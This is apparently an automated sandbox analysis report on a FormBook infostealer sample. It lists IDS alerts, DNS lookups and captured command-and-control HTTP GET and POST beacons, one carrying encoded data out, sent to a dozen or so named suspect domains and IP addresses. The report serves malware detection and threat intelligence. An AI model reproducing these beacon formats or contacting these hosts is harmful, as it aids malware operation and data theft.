Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49973 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49973 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50005 -> 192.186.58.31:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 192.186.58.31:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49989 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49997 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 192.186.58.31:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50001 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 192.186.58.31:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50017 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50017 -> 75.2.103.23:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.thinkone.xyz
Source:	DNS query: www.l03678.xyz

Source: Joe Sandbox View	IP Address: 75.2.103.23 75.2.103.23
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90

Source: Joe Sandbox View	ASN Name: TELINEABA TELINEABA
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00F722EE

Source: global traffic	HTTP traffic detected: GET /ou8k/?cNPH=sHhXhPPev91RFxpiABH++MCfuMPpFFZ8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmO0sI7dzm7yirMvYOFPgxKsvpHXbsFCpq0n5Sy3gZxoaEsqIw5Xzm0kuoI&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.aoivej.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /wl3x/?cNPH=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.givvjn.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /xbnt/?EtJTX=_JVX4ryxDRQpLJF&cNPH=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.gern.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.newbh.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /b0aw/?EtJTX=_JVX4ryxDRQpLJF&cNPH=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.thinkone.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /ixqi/?cNPH=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.mraber.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /okq9/?cNPH=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.fzmmkj.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.l03678.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /lkpz/?EtJTX=_JVX4ryxDRQpLJF&cNPH=a+8tZPlcc3MNn/IO7b26MGHwqGX4ZM28Vil8O2eWSStdH20Wtc2TLwFiK67R05JNij1gEaiCLQN0rb1G+EZEFovULwD+AM9JU3Wl4pQU58Rskq7vQFRuJegvcl6TpOCUQoL70LsVvLez HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.aihuzhibo.netConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.dkeqqi.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.uzshou.worldConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /uj4z/?cNPH=Rv+d8Vs9QFh7eFGUjZF/XurtC+CuZHbGRmUS1zsDZ6F1EcO3zJOMOEGzKUBqsPG0xKvqL2cjuvX3dLI344VOQvo4ekzNmUg9f6dKwYBEi/hv3+rbh8HEetaIdO68foaZIfZ4bIgAitoH&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.orthomumbai.onlineConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)

Source: global traffic	DNS traffic detected: DNS query: www.aoivej.info
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.gern.dev
Source: global traffic	DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic	DNS traffic detected: DNS query: www.thinkone.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mraber.dev
Source: global traffic	DNS traffic detected: DNS query: www.einpisalpace.shop
Source: global traffic	DNS traffic detected: DNS query: www.multichaindapps.pro
Source: global traffic	DNS traffic detected: DNS query: www.fzmmkj.shop
Source: global traffic	DNS traffic detected: DNS query: www.l03678.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aihuzhibo.net
Source: global traffic	DNS traffic detected: DNS query: www.dkeqqi.info
Source: global traffic	DNS traffic detected: DNS query: www.uzshou.world
Source: global traffic	DNS traffic detected: DNS query: www.orthomumbai.online
Source: global traffic	DNS traffic detected: DNS query: www.44756.pizza

Source: unknown

HTTP traffic detected: POST /wl3x/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.givvjn.infoOrigin: http://www.givvjn.infoReferer: http://www.givvjn.info/wl3x/Content-Length: 217Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)Data Raw: 63 4e 50 48 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 64 6e 75 47 77 30 4a 2f 47 65 6a 35 59 69 66 48 6a 73 42 47 48 67 36 77 41 6f 31 52 6c 54 57 2f 37 49 54 64 43 6d 51 58 49 67 6e 5a 75 36 4e 73 41 3d 3d Data Ascii: cNPH=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNdnuGw0J/Gej5YifHjsBGHg6wAo1RlTW/7ITdCmQXIgnZu6NsA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:45:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:43:03 GMTServer: Apache/2.4.10 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>
